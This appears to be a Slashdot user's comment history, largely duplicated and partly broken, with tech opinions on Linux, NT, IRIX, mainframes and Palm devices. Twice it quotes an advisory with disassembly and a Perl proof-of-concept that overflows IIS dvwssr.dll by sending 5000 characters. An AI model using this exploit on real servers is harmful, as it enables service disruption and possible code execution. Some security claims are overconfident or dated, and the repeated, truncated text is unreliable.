We have been playing with dvwssr.dll and we've found a buffer overflow that stops the server from incoming connections, at least.
The code where the buffer overflow resides is:
mov eax, [edi+TEXTENSION_CONTROL_BLOCK.lpszQueryString] test eax, eax jz _text_581813FD push eax lea eax, [esp+14h+queryStringCoph] push eax call ds:lstrcpyA;see here MS ENGINEERS: BUFFER OVERFLOW test eax, eax jz _text_581813FD lea eax, [esp+10h+queryStringCoph] push eax call unescape_url
So, below is an example of how to exploit this vulnerability: Of course, having the source code makes it harder to find this types of bugs...
#!/usr/bin/perl print "GET/_vti_bin/_vti_aut/dvwssr.dll?"; print "a" x 5000; print " HTTP/1.1\nHost: yourhost\n\n";
We've been playing a little more trying to exploit this buffer overflow, and as we don't have InterDevs installed on our IIS, we copied the.dll to/msadc directory, and with this configuration, we have been able to make the code jump to our buffer. Under this circunstances, the actual BO allow to execute arbitrary code in the target machine. It's interesting to note that no log is generated as efect of this attack.
the palm has a crappy OS which crashes pretty often (although its databases protection stuff ensures your data stays without getting corrupted)..i hate to think of what its like with a wireless connection...there is content mainly the DOC (unrelated to any m$ software) e-books although the palm is difficult to read. battery life is very nice. simple webpages with text only are probably a helluva lot easier for the palms to parse..in general lynx friendly=palm friendly. i wish 3com would improve the OS tho.
i was on the internet at that point mainly going thru whois, telnet (yeah..telnet ports were open and allowed you to login to machines...i even logged into some nasa machines), archie (who can forget that?), gopher (text based WWW type protocol -- you could have continous connections thru it - really kewl), fido echoes (still around i see) and uucp for new transfers and stuff...i was on an irix box waay back then on a fairly decent link (around 100K or so) and i remember the coffee thing when it started..i think it used toi be a simple text type sensor and not a camera..it then evolved if i recall correctly.
oh yeah..riight. mainframe processors are sloow. they arent your top of the line number crunchers..most machines now will put them to shame. the mainframe has always been great on I/O but actually use one and you'll see that they dont have the performance of (say) a dual alpha mainboard. IBM rates em in CPW or some other weird figure which gives users no information...they/'d be really embarassed to sell a coupla million worth of mainframe with a benchmark figure lower than that of an alpha costing a couple of grand.
Re:As long as you morons think that Linux solves i
on
Linux on the Brain
·
· Score: 1
actually linux has more hardware support than most other cheap and/or good OSes so its a helluva lot easier to do it on linux. that said, i think choosing linux over IRIX is a big mistake in this case..some of the machines we use for CT stuff are IRIX boxen with 64 CPUs each and IRIX scales really well...load average of 20 and the machine feels like its a linux box with a load average of 0.0... that with 80 people logged in all number crunching.
umm..*cough* *cough* here's something interesting : openssh: Even though the OpenSSH code checks all input parameters carefully, internal RSAREF functions can still overflow.
some of the other MOOs and MUDs such as the now defunct cybersphere dealt with some problems well (i.e. players getting wiz only weapons would have those weapons degrade after a while) and some badly (i.e. i got kickbanned for exploiting the kill code..when a char died via a kill with a non player object moving the char rapidly sometimes produced an invulnerable "corpse" which could kill but not be killed..very useful...posting a message up on the board proclaiming what i did after exploiting it fully got me kickbanned and toaded)..it all depends on the GM/wizzen and i havent seen even one virtual community with GM/wizzen who could maintain the illusion completely. i guess having infinite power is impossible to keep under control all the time.
the RTlinux project seems to be built for it. also some companies have released embedded linux stuff (including distros) which they bundle with boards. theres also cygnus's ecos which is a gpled embedded os with a smaller footprint than linux.
umm..i hate to burst your fantasy but - BSD doesnt support more than one CPU. Solaris is the #1 ecommerce platform becuase its more reliable and scalable than almost anything else...including linux. Hardware crypto support for SSL has been around a long time in linux, NT and solaris on apache, netscape enterprise and every other webserver. just ask nfast.
The sentinel utility i wrote is essentially a tripwire clone with MD5 signatures replaced by the more secure RIPEMD-160 algorithm (and patent free to boot). download at http://zurk.sourceforge.net or http://zurk.netpedia.net...also on freshmeat.
you wouldnt want those commercials if you took 30 mins to download a 1 minute film over your 56K modem and 30 seconds of the one minute movie were commercials. trust me - internet content (specially video) needs to be commercial free. pissing off customers when an industry is just taking off is the *worst* thing you can do.
Are you really saying windows is a secure OS ? Do you know what a friggin pain it is to install windows NT with a read only program file directory or a read only winnt directory ? I took *two weeks* to tune an NT system enough so that applications could load from read only directories (why the hell does EVERY damn application want to write to its installed directory ??). Windows 95/98 dont even have the notion of security so forget about those pieces of utter shit. I've had to repatch *every* NT system multiple times over the course of a few months because m$hit releases such utter crap. Plus their security fixes take forever. if you think windoze is secure, get yourself a good shrink...or try adminning some windoze systems at least once over a period of time.
it depends..fiberoptic interconnects are already dropping in price and if you can get a fast enough bus on your cluster nodes and a fast enough interconnect it might catch up to traditional supercomputers. e.g. if you have 256 SGI octane machines with internal gigabyte per second class databuses connected via improved fiber interconnects (say 16Gbps cards & terabit switch connects) it would equal your supercomputers internal bus. granted, this thing is a bit far off, but not as far off as some people think.
umm..no. the data is encrypted and they'd have to get the keys to decrypt it which the owner of the site doesnt have. the keys are dynamically generated and change fairly rapidly.
simple...the files need to be signed and you need to know the signing key. redhat and other distros have already addressed this and include a signature as part of the files (rpm for example signs everything).
no no no. the point is being made VERY clearly. Its an attempt to show that freenet can be flooded with crap information using a DDos model of attack. unfortunately it seems to be failing gradually as the moderators "vote" and destroy the trolling posters. this is *exactly* the model freenet needs to survive on.
unfortunately this is an all too common scenario. theres are plenty of startups where the management are generally clueless fuckheads and the engineers/coders have to take all the heat from the generally incompetent idiots who run the place. and then they get stabbed in the back by clueless salespeople. The reason the company failed was not because of bad technology per se since a lot of companies exist providing crap, but because the CTO left. Lack of good technical guidance can make or break companies and this is one that broke. Lets face it - this was a fairly decent project and one which could have sold reasonably in the market, if it had been completed & executed properly.
the kernel hackers guide is great - khg.redhat.com is where i got my first taste of the kernel. You can check out a simple driver framework that i wrote at my website (zurk.sourceforge.net)..its a bit old (2.1.132 kernel) but it should give you a good start..if you can understand that much, you should be able to tackle the kernel easily. kernel code is fairly simple.
i dont hate it. it has its places..and i hate people carping about how secure it is out of the box when *nothing* is secure unless you actually look at it with a magnifying glass. i dont like the pace of development (too slow) and the lack of drivers. other than thats its just unix.
secure by default is worthless IMHO. a clueless admin can easily botch a secure by default system. much better to let the user learn the hard way even if its more painful. i personally spend at least a full day securing my linux boxen with ipchains, portsentry, sentinel, nmap etc after installation. its a good thing too - you learn a lot.
simple. turn off all services in inetd.conf ( or kill inetd ), turn on firewalling in your kernel and execute ipchains to deny all ports input. now try and hack a machine such as this one. you can *never* break a box like this no matter what distro you use or how many buffer overflows are in it. and its more secure than obsd default anyway. happy?
Slashdot Mirror
sorry to rain on yer parade but :
;see here MS ENGINEERS: BUFFER OVERFLOW
/_vti_bin/_vti_aut/dvwssr.dll?";
.dll to /msadc directory, and with
That is not correct.
We have been playing with dvwssr.dll and we've found a buffer overflow that stops the server from incoming connections, at least.
The code where the buffer overflow resides is:
mov eax, [edi+TEXTENSION_CONTROL_BLOCK.lpszQueryString]
test eax, eax
jz _text_581813FD
push eax
lea eax, [esp+14h+queryStringCoph]
push eax
call ds:lstrcpyA
test eax, eax
jz _text_581813FD
lea eax, [esp+10h+queryStringCoph]
push eax
call unescape_url
So, below is an example of how to exploit this vulnerability:
Of course, having the source code makes it harder to find
this types of bugs...
#!/usr/bin/perl
print "GET
print "a" x 5000;
print " HTTP/1.1\nHost: yourhost\n\n";
We've been playing a little more trying to exploit this buffer overflow, and as we don't
have InterDevs installed on our IIS, we copied the
this configuration, we have been able to make the code jump to our buffer.
Under this circunstances, the actual BO allow to execute arbitrary code in the target machine.
It's interesting to note that no log is generated as efect of this attack.
the palm has a crappy OS which crashes pretty often (although its databases protection stuff ensures your data stays without getting corrupted) ..i hate to think of what its like with a wireless connection...there is content mainly the DOC (unrelated to any m$ software) e-books although the palm is difficult to read. battery life is very nice. simple webpages with text only are probably a helluva lot easier for the palms to parse..in general lynx friendly=palm friendly.
i wish 3com would improve the OS tho.
i was on the internet at that point mainly going thru whois, telnet (yeah..telnet ports were open and allowed you to login to machines...i even logged into some nasa machines), archie (who can forget that?), gopher (text based WWW type protocol -- you could have continous connections thru it - really kewl), fido echoes (still around i see) and uucp for new transfers and stuff...i was on an irix box waay back then on a fairly decent link (around 100K or so) and i remember the coffee thing when it started..i think it used toi be a simple text type sensor and not a camera..it then evolved if i recall correctly.
put it up on freshmeat as a group under the GPL. someone will find a use for it - whether as a benchmark suite or not.
oh yeah..riight. mainframe processors are sloow. they arent your top of the line number crunchers..most machines now will put them to shame. the mainframe has always been great on I/O but actually use one and you'll see that they dont have the performance of (say) a dual alpha mainboard. IBM rates em in CPW or some other weird figure which gives users no information...they/'d be really embarassed to sell a coupla million worth of mainframe with a benchmark figure lower than that of an alpha costing a couple of grand.
actually linux has more hardware support than most other cheap and/or good OSes so its a helluva lot easier to do it on linux. that said, i think choosing linux over IRIX is a big mistake in this case ..some of the machines we use for CT stuff are IRIX boxen with 64 CPUs each and IRIX scales really well...load average of 20 and the machine feels like its a linux box with a load average of 0.0 ... that with 80 people logged in all number crunching.
umm..*cough* *cough*
here's something interesting :
openssh:
Even though the OpenSSH code checks all input parameters carefully,
internal RSAREF functions can still overflow.
from : http://www.openbsd.org/advisories/sslUSA
some of the other MOOs and MUDs such as the now defunct cybersphere dealt with some problems well (i.e. players getting wiz only weapons would have those weapons degrade after a while) and some badly (i.e. i got kickbanned for exploiting the kill code ..when a char died via a kill with a non player object moving the char rapidly sometimes produced an invulnerable "corpse" which could kill but not be killed..very useful...posting a message up on the board proclaiming what i did after exploiting it fully got me kickbanned and toaded)..it all depends on the GM/wizzen and i havent seen even one virtual community with GM/wizzen who could maintain the illusion completely. i guess having infinite power is impossible to keep under control all the time.
the RTlinux project seems to be built for it. also some companies have released embedded linux stuff (including distros) which they bundle with boards. theres also cygnus's ecos which is a gpled embedded os with a smaller footprint than linux.
umm...ssh exploit anyone ? yes, openssh was vulnerable to it. theo's released a few patches for the current version of openBSD too.
umm..i hate to burst your fantasy but -
BSD doesnt support more than one CPU.
Solaris is the #1 ecommerce platform becuase its more reliable and scalable than almost anything else...including linux.
Hardware crypto support for SSL has been around a long time in linux, NT and solaris on apache, netscape enterprise and every other webserver. just ask nfast.
The sentinel utility i wrote is essentially a tripwire clone with MD5 signatures replaced by the more secure RIPEMD-160 algorithm (and patent free to boot). download at http://zurk.sourceforge.net or http://zurk.netpedia.net...also on freshmeat.
you wouldnt want those commercials if you took 30 mins to download a 1 minute film over your 56K modem and 30 seconds of the one minute movie were commercials. trust me - internet content (specially video) needs to be commercial free. pissing off customers when an industry is just taking off is the *worst* thing you can do.
Are you really saying windows is a secure OS ? Do you know what a friggin pain it is to install windows NT with a read only program file directory or a read only winnt directory ? I took *two weeks* to tune an NT system enough so that applications could load from read only directories (why the hell does EVERY damn application want to write to its installed directory ??). Windows 95/98 dont even have the notion of security so forget about those pieces of utter shit. I've had to repatch *every* NT system multiple times over the course of a few months because m$hit releases such utter crap. Plus their security fixes take forever. if you think windoze is secure, get yourself a good shrink...or try adminning some windoze systems at least once over a period of time.
it depends..fiberoptic interconnects are already dropping in price and if you can get a fast enough bus on your cluster nodes and a fast enough interconnect it might catch up to traditional supercomputers. e.g. if you have 256 SGI octane machines with internal gigabyte per second class databuses connected via improved fiber interconnects (say 16Gbps cards & terabit switch connects) it would equal your supercomputers internal bus. granted, this thing is a bit far off, but not as far off as some people think.
umm..no. the data is encrypted and they'd have to get the keys to decrypt it which the owner of the site doesnt have. the keys are dynamically generated and change fairly rapidly.
simple...the files need to be signed and you need to know the signing key. redhat and other distros have already addressed this and include a signature as part of the files (rpm for example signs everything).
no no no. the point is being made VERY clearly. Its an attempt to show that freenet can be flooded with crap information using a DDos model of attack. unfortunately it seems to be failing gradually as the moderators "vote" and destroy the trolling posters. this is *exactly* the model freenet needs to survive on.
looks good to me : http://blowthedotoutyourass.com/mission_01/mission _01.html
try having some *patience* or check your ip connection.
unfortunately this is an all too common scenario. theres are plenty of startups where the management are generally clueless fuckheads and the engineers /coders have to take all the heat from the generally incompetent idiots who run the place. and then they get stabbed in the back by clueless salespeople. The reason the company failed was not because of bad technology per se since a lot of companies exist providing crap, but because the CTO left. Lack of good technical guidance can make or break companies and this is one that broke. Lets face it - this was a fairly decent project and one which could have sold reasonably in the market, if it had been completed & executed properly.
the kernel hackers guide is great - khg.redhat.com is where i got my first taste of the kernel. You can check out a simple driver framework that i wrote at my website (zurk.sourceforge.net) ..its a bit old (2.1.132 kernel) but it should give you a good start ..if you can understand that much, you should be able to tackle the kernel easily. kernel code is fairly simple.
i dont hate it. it has its places..and i hate people carping about how secure it is out of the box when *nothing* is secure unless you actually look at it with a magnifying glass. i dont like the pace of development (too slow) and the lack of drivers. other than thats its just unix.
secure by default is worthless IMHO. a clueless admin can easily botch a secure by default system. much better to let the user learn the hard way even if its more painful. i personally spend at least a full day securing my linux boxen with ipchains, portsentry, sentinel, nmap etc after installation. its a good thing too - you learn a lot.
two celerons = $100
one abit BP6 = $125
SMP = priceless (or $225)
any questions ?
simple. turn off all services in inetd.conf ( or kill inetd ), turn on firewalling in your kernel and execute ipchains to deny all ports input. now try and hack a machine such as this one. you can *never* break a box like this no matter what distro you use or how many buffer overflows are in it. and its more secure than obsd default anyway. happy?